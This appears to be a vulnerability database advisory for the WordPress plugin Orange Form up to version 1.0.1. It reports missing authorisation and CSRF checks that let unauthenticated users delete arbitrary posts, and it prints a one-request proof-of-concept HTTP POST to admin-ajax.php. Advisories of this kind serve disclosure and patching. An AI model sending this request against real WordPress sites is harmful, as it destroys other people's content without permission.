Lucene search

K
wpvulndbFrancesco CarlucciWPVDB-ID:78BC7CF1-7563-4ADA-AEC9-AF4C943E3E2C
HistoryDec 29, 2021 - 12:00 a.m.

Orange Form <= 1.0.1 - Unauthenticated Arbitrary Post Deletion

2021-12-2900:00:00
Francesco Carlucci
wpscan.com
10
unauthenticated access
arbitrary deletion
csrf vulnerability
ajax calls
post security

EPSS

0.001

Percentile

36.7%

The plugin does not have any authorisation and CSRF checks in all of its AJAX calls, for example the or_delete_filed one which is available to both unauthenticated and authenticated users could allow attackers to delete arbitrary posts.The AJAX calls performing actions on posts also do not ensure that the post belong to them (or that they are allowed to perform such action on it)

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 35 Connection: close action=or_delete_filed∨_pf_id={post_id}

EPSS

0.001

Percentile

36.7%

Related for WPVDB-ID:78BC7CF1-7563-4ADA-AEC9-AF4C943E3E2C